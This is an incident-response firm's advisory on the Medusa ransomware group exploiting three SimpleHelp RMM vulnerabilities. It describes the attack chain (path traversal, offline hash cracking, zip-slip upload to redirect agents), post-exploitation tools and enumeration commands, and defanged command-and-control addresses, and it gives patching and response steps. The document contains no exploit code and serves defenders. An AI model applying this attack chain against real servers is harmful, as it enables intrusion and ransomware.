Cyber threat advisory: Medusa and the SimpleHelp vulnerability

S-RM’s incident response team has observed a significant uptick in ransomware groups using a chain of recently disclosed vulnerabilities in the SimpleHelp Remote Monitoring and Management (RMM) tool to gain access to victims’ networks. In particular we have observed the ransomware group Medusa using this method of entry to target several victims.

The vulnerabilities, which were assigned on 14 January 2025 following the release of a patch by Simple Help on 13 January 2025. The vulnerabilities affect versions 5.5.7 and earlier and are identified as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728. Those using the SimpleHelp tool in-house or via an outsourced IT managed service provider should urgently patch the server and rotate password for all SimpleHelp technician accounts to mitigate the issue.

Details of SimpleHelp vulnerabilities 

• CVE-2024-57726 (CVSS: 9.9): This vulnerability allows technicians with limited privileges to generate API keys with elevated permissions. Such API keys could be exploited to escalate privileges to the server admin level.
• CVE-2024-57727 (CVSS: 7.5): This flaw involves multiple path traversal vulnerabilities, permitting unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files may reveal server configuration data, including various secrets and hashed user passwords.
• CVE-2024-57728 (CVSS: 7.2): This vulnerability permits admin users to upload arbitrary files anywhere on the SimpleHelp file system by exploiting a crafted zip file, known as a zip slip. This could lead to arbitrary code execution on the host system in the context of the SimpleHelp server user.

Potential impact

Despite it being theoretically possible to exploit CVE-2024-57726, we have not observed this activity in any of the SimpleHelp investigations S-RM has completed to date. As of 6 March 2025, Medusa and other threat actors have combined CVE-2024-57727 and CVE-2024-57728 to gain administrative access and seize control of the SimpleHelp RMM server. This allows attackers to hijack active SimpleHelp agents, tamper with their configurations and point them towards malicious command-and-control infrastructure. As a result, threat actors do not need to exploit the third vulnerability, CVE-2024-57726, to result in the compromise of SimpleHelp.

Medusa ransomware exploitation of SimpleHelp vulnerabilities

Since 6 February 2025, S-RM has responded to several incidents involving the ransomware group Medusa, where this group has exploited SimpleHelp vulnerabilities to gain initial access to victims’ infrastructure. After gaining initial access, the group used the SimpleHelp tool to move around victims’ networks and ultimately exfiltrate data and encrypt systems.

Across our cases, we see Medusa opt for the following attack chain:

• Exploit CVE-2024-57727: Medusa exploit a path traversal vulnerability which allows them to download the SimpleHelp RMM configuration file and other system files from the SimpleHelp management server. Then, offline, Medusa cracks the hashes for the passwords to the SimpleHelp ‘technician’ accounts, allowing them to login as a SimpleHelp technician remotely.
• Exploit CVE-2024-57728: Once access to a technician account is achieved, Medusa uses this account to exploit a second vulnerability which allows for unauthorized file uploads and remote code execution. They use these unauthorized privileges to tamper with the configuration files on the SimpleHelp management server, pointing existing SimpleHelp RMM agents to communicate with their command and control servers. Medusa ransomware group, known for its financially motivated operations, has been active since at least 2021 and was among the top five most frequently observed threat actors in S-RM’s ransomware cases in 2024. Medusa has an established track record of exploiting software vulnerabilities in public-facing infrastructure for initial access. For example, prior to their current campaign, in June 2024, they exploited a SQL injection vulnerability in FortiClient Enterprise Management Server instances to gain access to multiple victims’ network.

Remediation

We urgently advise all organisations utilising the versions 5.5.7 and all earlier releases of SimpleHelp Remote Monitoring and Management (RMM) Software to apply the following remediation steps:

• SimpleHelp v5.5 Users – Patch SimpleHelp v5.5.8 and later versions to resolve these vulnerabilities.
• SimpleHelp v5.4 Users – Patch SimpleHelp to v5.4.10.
• SimpleHelp v5.3 Users - Patch SimpleHelp to v5.3.9.

S-RM has responded to several cases where Medusa accessed SimpleHelp management servers after they had been patched, as the SimpleHelp technician accounts had not had their account credentials reset as part of the patching process. Therefore, alongside patching your SimpleHelp RMM management server, we highly recommend resetting all passwords for accounts associated with the service.

In addition, if you have been using a vulnerable version of SimpleHelp for a significant period after the vulnerabilities were disclosed, out of an abundance of caution, consider reviewing your existing security systems and logging platforms to verify whether there is any evidence the vulnerability has already been exploited for a threat actor to gain access.

Post exploitation tactics identified

S-RM's Incident Response team has identified the following tactics, techniques, and procedures (TTPs) employed by threat actors immediately after exploiting the SimpleHelp vulnerability:

• Installation of Cloudflared: Attackers have been observed installing Cloudflared as a service on systems where the SimpleHelp agent is present, allowing them to maintain persistent access and facilitate command-and-control activities.
• Execution of RClone: The use of RClone has been detected on affected systems with the SimpleHelp agent. RClone is typically utilized for data exfiltration due to its ability to synchronize files with cloud storage services.
• System Enumeration: Attackers have executed system enumeration commands such as ipconfig /all, sc query, driverquery, net share, net use, and nltest dclist to gather information about the network and system configuration.
• External Connections: There have been connections to the external IP addresses 213.183.63[.]41, 144.217.181[.]205, and 89.36.161[.]17, indicating possible command-and-control or data exfiltration channels.
• Installation of PDQ Deploy: The installation of PDQ Deploy on compromised systems has been identified. This tool can be used for deploying additional malicious tools or payloads across the network. S-RM has observed this tool being used to deploy a Medusa ransomware binary named ‘gaze.exe’.

If malicious activity is identified

1. Trigger your incident response plan
2. Engage your insurance if in place
3. Seek the help of an expert cyber incident response legal firm and a technical incident response team
4. Preserve evidence (starting with volatile evidence like firewall logs)
5. Work with experts to implement a containment plan and conduct a forensic investigation across impacted devices

Written by Tim Geschwindt and Josh Rawse. Edited by Dan Caplin.

Contact S-RM for further information about the vulnerabilities and response steps.